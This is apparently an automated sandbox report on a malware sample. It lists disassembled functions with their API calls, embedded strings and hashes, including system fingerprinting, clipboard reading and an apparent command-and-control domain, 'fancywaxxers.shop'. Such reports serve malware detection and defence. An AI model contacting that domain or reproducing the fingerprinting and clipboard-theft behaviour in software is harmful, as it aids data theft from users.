Opcode ID: 4253ba6b8e191a9b3dfd493019a759a11414da6281240eda0209736fa868e564
Instruction ID: ce2e31214bed253c0b38068d6f273c2badb2212a27c3daf9020c2c42f253850c
Opcode Fuzzy Hash: 4253ba6b8e191a9b3dfd493019a759a11414da6281240eda0209736fa868e564
Instruction Fuzzy Hash: 66C1373160C3908BC725CF2994903AFBFE1AF9A304F5849AED4C9D7352D7798806CB5A

Function 0042C26C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 337
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C358

Strings

BVAI, xrefs: 0042C52A

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: BVAI
API String ID: 3960555810-2651495128
Opcode ID: 0a1af248bc305b655ffc1925307390703c8d3f98765630551724a65d64f27431
Instruction ID: 4ac38620278a99acf54b81f63bd20ff9ec3c0600e4476075f1787c1a2961d72f
Opcode Fuzzy Hash: 0a1af248bc305b655ffc1925307390703c8d3f98765630551724a65d64f27431
Instruction Fuzzy Hash: 9FA1397160C3908BC725CF2994903EFBBE1AF9B304F58496ED4C997342D7798906CB5A

Function 0042C282 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 331
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C358

Strings

BVAI, xrefs: 0042C52A

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: BVAI
API String ID: 3960555810-2651495128
Opcode ID: e77831ec273681899d33ca959c897361b3e2c49e039e5f7857a3c08ac24816b6
Instruction ID: b3ae04337b81b82226eeb8f92f7c3334391f9750b5f809a1d1c02d35e42eb35b
Opcode Fuzzy Hash: e77831ec273681899d33ca959c897361b3e2c49e039e5f7857a3c08ac24816b6
Instruction Fuzzy Hash: E6A1377160C3908BC7258F2994903EFBFE1AF9A304F58496ED4C997352D7798806CB5A

Function 00440480 Relevance: 2.8, Strings: 2, Instructions: 345COMMON

Download Yara Rule

Strings

=:;8, xrefs: 004404F4
, xrefs: 00440534, 00440570, 00440608

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: InitializeThunk
String ID: =:;8$
API String ID: 2994545307-3594289699
Opcode ID: 9971fbae55c470a46498d2abe49c779c55fc4cb17bce0a149da73fd2c7f0910c
Instruction ID: c423fdc3fd0ad810bcad91faa20af3043e37e718d9259fa2435a4e627f55f2db
Opcode Fuzzy Hash: 9971fbae55c470a46498d2abe49c779c55fc4cb17bce0a149da73fd2c7f0910c
Instruction Fuzzy Hash: AFA1657AB083104BE724DF64D88066BB7E2EBD5314F19853DDAC297341DA38EC25CB96

Function 00426000 Relevance: 2.8, Strings: 2, Instructions: 286COMMON

Download Yara Rule

Strings

{ts|, xrefs: 004262A6
Zysf, xrefs: 004262C0

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: InitializeThunk
String ID: Zysf${ts|
API String ID: 2994545307-929106683
Opcode ID: 330ee75e3bd9f455a8908d9dc58e8014dd1dde360c5c7ac0f7533fcfcbbb6c79
Instruction ID: d8bc85cb00ae77c9a618740bd9c139a142b3571fb9705fb1d300c60273d40d62
Opcode Fuzzy Hash: 330ee75e3bd9f455a8908d9dc58e8014dd1dde360c5c7ac0f7533fcfcbbb6c79
Instruction Fuzzy Hash: 0F817EB1B083219BD714DF25EC81B3B73A6DBC5314F59843EE58697392E63CAC04839A

Function 0040C22D Relevance: 2.6, Strings: 2, Instructions: 102COMMON

Download Yara Rule

Strings

uJ[L, xrefs: 0040C23E
yJ[L, xrefs: 0040C26F

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: uJ[L$yJ[L
API String ID: 0-3296124075
Opcode ID: 0a5ccc53d7ad34005281885bb5bdc5f0493f34b58fb1c7104cb2bead719577d2
Instruction ID: 974635f0455fef9b14944d53f12c23bc89291c5e3f93e9d67168785d5e3144d2
Opcode Fuzzy Hash: 0a5ccc53d7ad34005281885bb5bdc5f0493f34b58fb1c7104cb2bead719577d2
Instruction Fuzzy Hash: EC31E5B2A405019FDB19CF68CC627AE7BE2EB59310F29417DD252E7790DB3999018718

Function 0043D910 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(004409B8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043D93E

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043DCE9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

D]+\, xrefs: 0043DD60

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: D]+\
API String ID: 0-1174097187
Opcode ID: 34dca2a2c48cd4858e45e2c56d254a9ae5f171e70086b16834debb71bec6d78b
Instruction ID: 8b969df8764a6140270626732b9a31d532f0956a4ad419ee8c7d181fdb0ffe63
Opcode Fuzzy Hash: 34dca2a2c48cd4858e45e2c56d254a9ae5f171e70086b16834debb71bec6d78b
Instruction Fuzzy Hash: A1314878B482008BE7188F42E99073B73A6E7CE300F29753ED481172C6C2389C129B9E

Function 0043FB80 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e6d4e30f96187bd1b78eb7bdb56660af8907fc12caa95b9222812f4f9925037d
Instruction ID: 6d45d2c3cd36f3333d69d70c7c241f502430d0bdfbc6ce3510ca67b0fea4cfba
Opcode Fuzzy Hash: e6d4e30f96187bd1b78eb7bdb56660af8907fc12caa95b9222812f4f9925037d
Instruction Fuzzy Hash: 2D614875A583015BDB148F18C851B2BB3A2EFDD310F19A43EE986873A5DB34DC15C74A

Function 0042B842 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042B875
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B924

Strings

KHGN, xrefs: 0042B89B
#v, xrefs: 0042B875

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: KHGN$#v
API String ID: 2904949787-1045450214
Opcode ID: a5ac04ea9e230b6cf3948a8bb0ad38f6cf67380a18d58efd62aba391322e45a0
Instruction ID: 6cc2bcf1cdf43af400e598cc500c9cf08bcf6da0c1c09473a882a53858423e11
Opcode Fuzzy Hash: a5ac04ea9e230b6cf3948a8bb0ad38f6cf67380a18d58efd62aba391322e45a0
Instruction Fuzzy Hash: 3021D17014C2858EDB218F35A860BFB7FE4DB9B344F58486ED0C9C3292CB39444A9B56

Function 0042B840 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042B875
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B924

Strings

KHGN, xrefs: 0042B89B
#v, xrefs: 0042B875

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: KHGN$#v
API String ID: 2904949787-1045450214
Opcode ID: 212394f20273f3accb8bcfc3a76da6794d37ce9a05dd71fc593275c859e58dc8
Instruction ID: 50f42b0a951807a88e86a22aae57dbd367c2f88d39f0ae760fbcdf6f8fc845ea
Opcode Fuzzy Hash: 212394f20273f3accb8bcfc3a76da6794d37ce9a05dd71fc593275c859e58dc8
Instruction Fuzzy Hash: 001123B01482858FD7219F35E860BEB7FE4EB9B344F54482DD0C9C3251CB39484A9B92

Function 0042B94D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 0042BA54

Strings

bC, xrefs: 0042B992

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: ComputerName
String ID: bC
API String ID: 3545744682-4190571504
Opcode ID: 1c1f9430f5f3ed989211da8c26079c9bdb17ff075c2385f7f8c8286cc26a0825
Instruction ID: e82d825c06ad02e345faf7a0e59537a249da3b56fbe03ec142442aa4babbea04
Opcode Fuzzy Hash: 1c1f9430f5f3ed989211da8c26079c9bdb17ff075c2385f7f8c8286cc26a0825
Instruction Fuzzy Hash: 5421053560D3E18BD7358F2594943FABBE1EF92300F59885EC8CA9B341CA794409CB96

Function 0042B948 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 0042BA54

Strings

bC, xrefs: 0042B992

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: ComputerName
String ID: bC
API String ID: 3545744682-4190571504
Opcode ID: b23871937633dcdb680c72e96aa5e58338da0fb26077f9adf21ebf2712c0bdc7
Instruction ID: 8a9ff360a492162640ec0ee52e10ad36b0c35468f5dd3550f358dda6bb680e87
Opcode Fuzzy Hash: b23871937633dcdb680c72e96aa5e58338da0fb26077f9adf21ebf2712c0bdc7
Instruction Fuzzy Hash: 6B21257660D3A0CBD734CF2094843BAB7E2EFC6300F55895EC8CA9B340CA745806CB96

Function 0042B7AD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B924

Strings

KHGN, xrefs: 0042B89B

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: ComputerName
String ID: KHGN
API String ID: 3545744682-1032087821
Opcode ID: a8e5dbbfad83db7d0e3a07a32037c9f22d764ac268d76ac342ec4c4dcc5ae117
Instruction ID: 800fda513f984b05936c8cd62631b8339e5399499a0172a9c9d32c48e16ec2f1
Opcode Fuzzy Hash: a8e5dbbfad83db7d0e3a07a32037c9f22d764ac268d76ac342ec4c4dcc5ae117
Instruction Fuzzy Hash: 4F1129B41483858FD7219F35A8A0BFB7FE4DB9B344F54482DD0C9C3241CB39444A9B92

Function 00409D5E Relevance: 1.6, APIs: 1, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000070), ref: 00409E1A

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: eab48f6b71edd1e16cfb7ea63385da2791f2a8b668b563faa9f76ea0567173db
Instruction ID: 794dd10beed9ab1fdd81d0f6796807d90850f10cc366af128ac51e95daa83683
Opcode Fuzzy Hash: eab48f6b71edd1e16cfb7ea63385da2791f2a8b668b563faa9f76ea0567173db
Instruction Fuzzy Hash: C3110879A842508FC7188F25D8816A97FF1FB55325B19D0ADD491EB363C23CD846CB58

Function 0043D880 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41a367038b1e6d5b58ec4f6eb87556ec12abeaa4ee6647b370c191bf25488890
Instruction ID: 0f926294dc6f60f2445246b0eb10c1f08d66fb03fcf9e8185527a5568484abe7
Opcode Fuzzy Hash: 41a367038b1e6d5b58ec4f6eb87556ec12abeaa4ee6647b370c191bf25488890
Instruction Fuzzy Hash: 3AF0F075518302EFD7242F29BC49B17367CEF8B306F04183AF50191062DB35EC059769

Function 00436805 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 00436831

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 8b12c406fd4ead613e65197ffde3b6cb62fb5e3e077589beab3fbb298c2b36b5
Instruction ID: c1e6da90ff38b23c1098b9489220249bba1124fa0f23aac35cb26dcf4f2101a0
Opcode Fuzzy Hash: 8b12c406fd4ead613e65197ffde3b6cb62fb5e3e077589beab3fbb298c2b36b5
Instruction Fuzzy Hash: 31110434908686CFC719DB3888512A8BFB27F6B304F05839CC48D873A2DB35A954CF22

Function 0042DE0C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042DE5A

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 8f7cb6371b4caf162f46c922943df2f09589c22896729318bee07ad160b03f59
Instruction ID: eb4d188fa3b2335ac580bcc65c14ba02f7638069044a76079abd789a2c862b60
Opcode Fuzzy Hash: 8f7cb6371b4caf162f46c922943df2f09589c22896729318bee07ad160b03f59
Instruction Fuzzy Hash: B8F0E2B56097028FE301DF25C55874BBBE6BBC8314F25891CE0A44B751C7B9AA898FC2

Function 004316B2 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004316F7

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 2c655fd4df2f0de855ff40a5662be0aaac86da99f90f76558f58a47c1ac7514f
Instruction ID: 6701a38e9beb56b1775abd9ce08e5b6b7616d16b42eebe8ce345441057ef8d6a
Opcode Fuzzy Hash: 2c655fd4df2f0de855ff40a5662be0aaac86da99f90f76558f58a47c1ac7514f
Instruction Fuzzy Hash: BBF074B46093029FE354DF69D5A871BBBE1EB88304F11881DE5958B390D7B59648CF82

Function 0040C660 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C673

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 413737427438556d5fa7e0556733acb83c5b4eac6897b874756f3227497564db
Instruction ID: a6b7534e426cd29cb0e1e31caee4a3ce77516a25d8fe1d9d75e6d40f069d1f8c
Opcode Fuzzy Hash: 413737427438556d5fa7e0556733acb83c5b4eac6897b874756f3227497564db
Instruction Fuzzy Hash: CBE0C236E506442BD6046B1CDC47F8A3A1AC3C3726F4C8234A550CA2C5E938B910C15E

Function 0040C69E Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C6B0

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 4b317f61b4ed6c220f3feb26dab4a859da40cf1549f870816065b6807c59d919
Instruction ID: ca338ed000cba09c134a9ecbf479b52692d88648cc8417c010cf118771328cdf
Opcode Fuzzy Hash: 4b317f61b4ed6c220f3feb26dab4a859da40cf1549f870816065b6807c59d919
Instruction Fuzzy Hash: 7DE05E39BD47406BFA385B08DC13F4422129386F21F388224B310EE7D9C8A8B501420C

Function 0043E6A5 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043E6A5

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: b48e2f79c62e4811e334b2433c8222d9ec698c1a03c7fb9f9c38adda7ff18471
Instruction ID: eb5cd64e0cd090f695d5de900f82e4eebcc02a3ea27d0b2ee91ac1c0039229b8
Opcode Fuzzy Hash: b48e2f79c62e4811e334b2433c8222d9ec698c1a03c7fb9f9c38adda7ff18471
Instruction Fuzzy Hash: 2BC012EC9084808BC248EB12EC4252A3B5EAA8A209B049038D80B02B23E9306805968A

Function 0043BCB0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,00000000,0043D8F6,?,?,?,00000000,0040B40D,00000000,00000000), ref: 0043BCCE

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 85ba4f6bb3df290ded2e1b23f993eb3f5d5984f7020326030569786283a59457
Instruction ID: 6c6d5fcf156c4dc9181b7fd85535f9ef3000d663acf77e4cc9904710c0b9b036
Opcode Fuzzy Hash: 85ba4f6bb3df290ded2e1b23f993eb3f5d5984f7020326030569786283a59457
Instruction Fuzzy Hash: AED01231405122EBC7241F18FD06B873B64DF0A321F030472B8006B071C664EC519AD8

Function 0043BC90 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,AC36FDA1,00408797,2D2C008A), ref: 0043BCA0

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b3415836e398222536a54de0d850da02531c529426d1bee4289f1127ff9466bd
Instruction ID: 28c2b2b5d3f1f64fcd0aca9316f6b1f640d95bbb8965ee836e226e74b875d2a4
Opcode Fuzzy Hash: b3415836e398222536a54de0d850da02531c529426d1bee4289f1127ff9466bd
Instruction Fuzzy Hash: DBC09B31445121ABC6142B15FD05FC67F64DF45355F114066B40467073C770AC41D6D8

Non-executed Functions

Function 00416F8D Relevance: 15.1, APIs: 4, Strings: 4, Instructions: 1114COMMON

Download Yara Rule

Strings

@AF, xrefs: 004178B8
A, xrefs: 00417053
S,3!, xrefs: 00417095
bxA, xrefs: 00417857

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: A$S,3!$bxA$@AF
API String ID: 0-2069903589
Opcode ID: 51a7bc412986f8b3ea5974b480de9a556fa70d4e40814ebbc0f959896439f117
Instruction ID: 6ded76c8cc6ff0f80e96e1d1ae2300ae6fa5ef525a8552055949680e93883b28
Opcode Fuzzy Hash: 51a7bc412986f8b3ea5974b480de9a556fa70d4e40814ebbc0f959896439f117
Instruction Fuzzy Hash: FF72357150C3418BD324CF28C8907ABB7F2EF96314F19896EE4C587392E7398985CB96

Function 0042238D Relevance: 13.0, Strings: 10, Instructions: 549COMMON

Download Yara Rule

Strings

fancywaxxers.shop, xrefs: 0042281F
?', xrefs: 004224CF
-A+, xrefs: 004224AF
(99#, xrefs: 004224B7
%<$, xrefs: 004224BF
~|, xrefs: 00422736
gM, xrefs: 0042252D
OIE{, xrefs: 00422588
"0B, xrefs: 00423016
Z_-c, xrefs: 004225A0

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: "0B$%<$$(99#$OIE{$Z_-c$fancywaxxers.shop$gM$-A+$~|$?'
API String ID: 0-1279965070
Opcode ID: 1a2107a0d9ca9d91116f4215fd163885d8c2ef582804c35b4f29d4efd173d59b
Instruction ID: 5c5e0a10dac633df7a7eb912dad582696f6b243f8df0ab356ae229ec7ebc779d
Opcode Fuzzy Hash: 1a2107a0d9ca9d91116f4215fd163885d8c2ef582804c35b4f29d4efd173d59b
Instruction Fuzzy Hash: D30279726083919FD318CF25D89176BBBE2FBD2314F588A6CE4D18B395D7788805CB86

Function 004111E9 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 499COMMON

Download Yara Rule

Strings

?, xrefs: 004113E9
f, xrefs: 0041175C
}, xrefs: 00411535
(, xrefs: 004116CF
u, xrefs: 004115C5

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: ($?$f$u$}
API String ID: 0-3561895482
Opcode ID: 034806d3cc72206703f70723c548ba8ea1711a660e6f03707adc4ef9bcdfc4e3
Instruction ID: 86e3bcde5e116734b7454ff0522683787c5f8ed0e2df54b8e8f55331097e388c
Opcode Fuzzy Hash: 034806d3cc72206703f70723c548ba8ea1711a660e6f03707adc4ef9bcdfc4e3
Instruction Fuzzy Hash: B212A371A0D7808BD324DF39C4813AFBBE1ABD5314F198A2FE5D997391D63889418B47

Function 004237D0 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 431COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 004238A8
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,6A195A3A), ref: 0042394C

Strings

lnmh, xrefs: 004253BF
]VWC, xrefs: 004253A4
52, xrefs: 00423856
QVTH, xrefs: 004253AC
n`fn, xrefs: 004253D5

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 52$QVTH$]VWC$lnmh$n`fn
API String ID: 237503144-3964871452
Opcode ID: f42c4c6db4055bdca425bc9ce26f544c9401cc625d8d536d0403780354460537
Instruction ID: 3b8b4807c8318ae77837d9a5b010143032c821d60a60d601bdcb57454f2de873
Opcode Fuzzy Hash: f42c4c6db4055bdca425bc9ce26f544c9401cc625d8d536d0403780354460537
Instruction Fuzzy Hash: 2FE1457160C3518FD720CF68D8917ABBBE1EB85314F444A3EF99587381D3B89906CB9A

Function 00438040 Relevance: 10.2, Strings: 8, Instructions: 194COMMON

Download Yara Rule

Strings

9, xrefs: 004380EC
T, xrefs: 0043816B
R, xrefs: 00438161
<, xrefs: 004380E7
b, xrefs: 00438166
&, xrefs: 004380E2
%, xrefs: 004380F1
W, xrefs: 0043815C

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: %$&$9$<$R$T$W$b
API String ID: 0-3780034300
Opcode ID: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
Instruction ID: 26f6469176a43b47c6e288f4693b2497bb05b8a0a051c4656522d96c8d770806
Opcode Fuzzy Hash: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
Instruction Fuzzy Hash: 10719F2250C7C28AD3128A7C484425BEFD25BE7234F2D9FADF4E5873D2C56AC50A9367

Function 00432D70 Relevance: 9.2, APIs: 6, Instructions: 179clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00432D80
GetClipboardData.USER32 ref: 00432DA1
GlobalLock.KERNEL32 ref: 00432DBA
CloseClipboard.USER32 ref: 00432FC8

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: Clipboard$CloseDataGlobalLockOpen
String ID:
API String ID: 1494355150-0
Opcode ID: 07f84929871a5c64471c921f03cbf394aaa8fd21632cc30f04fff1ccf22f28ed
Instruction ID: 693f7ef225a156252cf7c29a72516dce540735802ffb423964d4f98d76e8ff95
Opcode Fuzzy Hash: 07f84929871a5c64471c921f03cbf394aaa8fd21632cc30f04fff1ccf22f28ed
Instruction Fuzzy Hash: 5A510572A187614EC310DF7C894521FBAE15BC9224F098B3EE8E4973D1C678890A87D7

Function 006DAE27 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,006DA7DD,00000002,00000000,?,?,?,006DA7DD,?,00000000), ref: 006DAEC0
GetLocaleInfoW.KERNEL32(?,20001004,006DA7DD,00000002,00000000,?,?,?,006DA7DD,?,00000000), ref: 006DAEE9
GetACP.KERNEL32(?,?,006DA7DD,?,00000000), ref: 006DAEFE

Strings

OCP, xrefs: 006DAE7B
ACP, xrefs: 006DAE45

Memory Dump Source

